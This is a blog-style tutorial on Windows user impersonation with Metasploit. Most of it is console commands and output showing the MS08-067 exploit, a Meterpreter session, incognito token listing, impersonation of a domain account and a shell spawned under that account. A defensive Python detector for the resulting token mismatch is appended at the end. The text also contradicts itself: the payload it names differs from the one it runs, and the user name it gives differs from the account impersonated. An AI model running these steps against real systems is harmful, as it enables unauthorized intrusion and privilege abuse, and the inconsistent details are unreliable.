Impersonation of Users Using Metasploit -{Old but Effective}

Sep 11, 2017 08:17 PM

Now we will see how to impersonate a system user without having to create a new user with administrator permissions.

First, let's suppose that we have entered the PC with an exploit like:

  • exploit/windows/smb/ms08_067_netapi

and with a PAYLOAD like:

  • windows/vncinject/bind_tcp

In this case we will use the PAYLOAD windows/shell/bind_tcp. I will not explain much because many already know it.

```
msfconsole

       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 16 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 16 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >
```

After obtaining the Meterpreter session, we load the incognito extension with the use command:

```
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
```

Let's look at what commands the extension provides:

```
meterpreter > help

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

meterpreter >
```

We will use the list_tokens command. But first, let's see what parameters it takes:

```
meterpreter > list_tokens
Usage: list_tokens <list_order_option>

Lists all accessible tokens and their privilege level

OPTIONS:

    -g        List tokens by unique groupname
    -u        List tokens by unique username

meterpreter >
```

Now we list the users whose tokens exist on the system. Incognito separates delegation tokens (usable for local and network authentication) from impersonation tokens (usable only locally):

```
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >
```

Now comes the moment when we impersonate a user. Note that the backslash between domain and username is doubled on the command line:

```
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >
```

Open a console (remote shell) as the impersonated user. In this case the user ayman\Serverayman:

```
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP Versión 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
```
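From the defender's side, the execute step above leaves a clear trace: cmd.exe runs under COLTEJER\ServerColtejer while its parent, the exploited svchost.exe, runs as SYSTEM. The following script is an added example (not part of the original post) that joins process-creation events by PID and flags a child whose token owner differs from its parent's; the event records are constructed and the field names are an assumed Sysmon-like shape.

```python
"""Flag a process whose token owner differs from its parent's.

Added example, not part of the original post.  After impersonate_token, the
"execute -f cmd.exe -i -t" step spawns a shell from the exploited service
process (svchost.exe as SYSTEM) under the impersonated user's token; joining
process-creation events by PID exposes that mismatch.  Records are constructed;
field names are an assumed Sysmon-like shape (ProcessId, ParentProcessId, Image, User).
"""

# Constructed sample, in creation order; PID 1528 mirrors "Process 1528 created." above.
SAMPLE_EVENTS = [
    {"ProcessId": 1040, "ParentProcessId": 680,
     "Image": r"C:\WINDOWS\system32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 1528, "ParentProcessId": 1040,
     "Image": r"C:\WINDOWS\system32\cmd.exe", "User": r"COLTEJER\ServerColtejer"},
    {"ProcessId": 2000, "ParentProcessId": 1900,
     "Image": r"C:\WINDOWS\explorer.exe", "User": r"COLTEJER\ServerColtejer"},
    {"ProcessId": 2100, "ParentProcessId": 2000,
     "Image": r"C:\WINDOWS\system32\cmd.exe", "User": r"COLTEJER\ServerColtejer"},
]

# Parents that legitimately start children under another account (service
# control manager, logon chain); tune this allowlist per environment.
EXPECTED_SWITCHERS = {"services.exe", "winlogon.exe", "userinit.exe", "wininit.exe"}

def basename(path):
    """Lowercase file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_token_mismatches(events):
    """Return one finding per child whose User differs from its parent's User."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for child in events:
        parent = by_pid.get(child["ParentProcessId"])
        if parent is None:
            continue  # parent started before our window; nothing to compare
        if parent["User"].lower() == child["User"].lower():
            continue  # same token owner
        if basename(parent["Image"]) in EXPECTED_SWITCHERS:
            continue  # expected account switch by the logon/service chain
        findings.append({"child_pid": child["ProcessId"],
                         "child": basename(child["Image"]), "child_user": child["User"],
                         "parent": basename(parent["Image"]), "parent_user": parent["User"]})
    return findings

if __name__ == "__main__":
    for f in find_token_mismatches(SAMPLE_EVENTS): print(f)
```

Legitimate account switches (service start, interactive logon, runas) come through the parents in the allowlist, so the remaining hits are worth a look; the allowlist is a starting point, not a complete list.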
